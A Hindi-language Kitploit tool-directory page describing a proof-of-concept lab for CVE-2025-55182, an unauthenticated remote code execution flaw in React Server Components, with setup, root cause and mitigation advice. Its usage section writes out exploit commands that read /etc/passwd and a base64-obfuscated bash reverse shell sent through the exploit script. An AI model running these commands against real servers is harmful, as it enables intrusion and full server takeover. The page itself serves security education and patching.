Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell PoC लैब | Kitploit
उपकरण/GitHubGitHub/alsaut1/react2shell-lab
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंटलैब और अभ्यास
GitHubalsaut1/react2shell-lab

react2shell-lab

749 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 React2Shell PoC लैब

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 प्रयोगशाला

React सर्वर घटकों में गंभीर भेद्यता CVE-2025-55182 को प्रदर्शित करने और परीक्षण करने के लिए एक व्यापक प्रयोगशाला।

⚠️ केवल शैक्षिक उद्देश्य

यह रिपॉजिटरी इसके लिए अभिप्रेत है:

  • सुरक्षा अनुसंधान और शिक्षा
  • भेद्यता तंत्र को समझना
  • अपने स्वयं के सिस्टम पर परीक्षण
  • बग बाउंटी हंटिंग की तैयारी

उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। अनधिकृत पहुँच अवैध है।

🔴 भेद्यता विवरण

  • CVE ID: CVE-2025-55182
  • CVSS स्कोर: 10.0 (गंभीर)
  • प्रकार: अप्रमाणित रिमोट कोड निष्पादन (RCE)
  • प्रभावित घटक:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • मूल कारण: React सर्वर घटकों "Flight" प्रोटोकॉल में असुरक्षित डिसेरियलाइज़ेशन

⚡ क्षमताएँ

✅ बिना प्रमाणीकरण के मनमाने कमांड निष्पादित करें
✅ सिस्टम फ़ाइलें पढ़ें
✅ फ़ाइलें बनाएं और संशोधित करें
✅ रिवर्स शेल कनेक्शन स्थापित करें
✅ पूर्ण सर्वर नियंत्रण प्राप्त करें

🚀 त्वरित आरंभ

1. स्थापना

root@kitploit:~
टूल डाउनलोड करें
npm install --legacy-peer-deps npm run dev

सर्वर http://localhost:3000 पर शुरू होगा

2. भेद्यता जांचें

root@kitploit:~
bash check-cve.sh

3. एक्सप्लॉइट चलाना

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. रिवर्स शेल

root@kitploit:~
# टर्मिनल 1 - श्रोता
nc -lvnp 4444

# टर्मिनल 2 - एक्सप्लॉइट
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 परियोजना संरचना

root@kitploit:~
├── app/              # भेद्य Next.js एप्लिकेशन
├── exploit/          # कार्यशील PoC एक्सप्लॉइट
│   └── rce_final.py  # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── check-cve.sh      # स्वचालित भेद्यता जाँचकर्ता
├── package.json      # भेद्य निर्भरताएँ
└── README.md

🔧 तकनीकी विवरण

भेद्यता React सर्वर घटकों के पेलोड के डिसेरियलाइज़ेशन लॉजिक में मौजूद है। एक्सप्लॉइट process.mainModule.require('child_process').execSync() के माध्यम से मनमाना कोड निष्पादित करने के लिए प्रोटोटाइप प्रदूषण का लाभ उठाता है।

हमला प्रवाह

  1. दुर्भावनापूर्ण मल्टीपार्ट फॉर्म डेटा तैयार करें
  2. भेद्य React एप्लिकेशन पर भेजें
  3. "Flight" प्रोटोकॉल में असुरक्षित डिसेरियलाइज़ेशन का शोषण करें
  4. सर्वर पर RCE प्राप्त करें

📊 प्रभाव

  • गोपनीयता: उच्च (कोई भी फ़ाइल पढ़ें)
  • अखंडता: उच्च (फ़ाइलों को संशोधित/बनाएं)
  • उपलब्धता: उच्च (सेवा अस्वीकार कमांड निष्पादित करें)

✅ शमन

  1. React को 19.2.1 या बाद के संस्करण में अपडेट करें
  2. Next.js को 15.0.5+ या 16.0.7+ में अपडेट करें
  3. वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम तैनात करें
  4. शोषण प्रयासों के लिए सर्वर लॉग की निगरानी करें
  5. रनटाइम सुरक्षा तंत्र का उपयोग करें

📚 संदर्भ

  • react2shell.com
  • CVE-2025-55182 विवरण
  • React सुरक्षा सलाह
  • CVSS कैलकुलेटर

⚖️ कानूनी अस्वीकरण

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं। कंप्यूटर सिस्टम तक अनधिकृत पहुँच कंप्यूटर फ्रॉड और एब्यूज़ एक्ट (CFAA) और अन्य क्षेत्राधिकारों में समान कानूनों जैसे कानूनों के तहत अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

🎓 सीखने के परिणाम

इस प्रयोगशाला के माध्यम से काम करने के बाद, आप समझ जाएंगे:

  • असुरक्षित डिसेरियलाइज़ेशन भेद्यताएँ कैसे काम करती हैं
  • प्रोटोटाइप प्रदूषण आक्रमण तकनीकें
  • React सर्वर घटकों की वास्तुकला
  • RCE शोषण विधियाँ
  • उचित भेद्यता प्रकटीकरण अभ्यास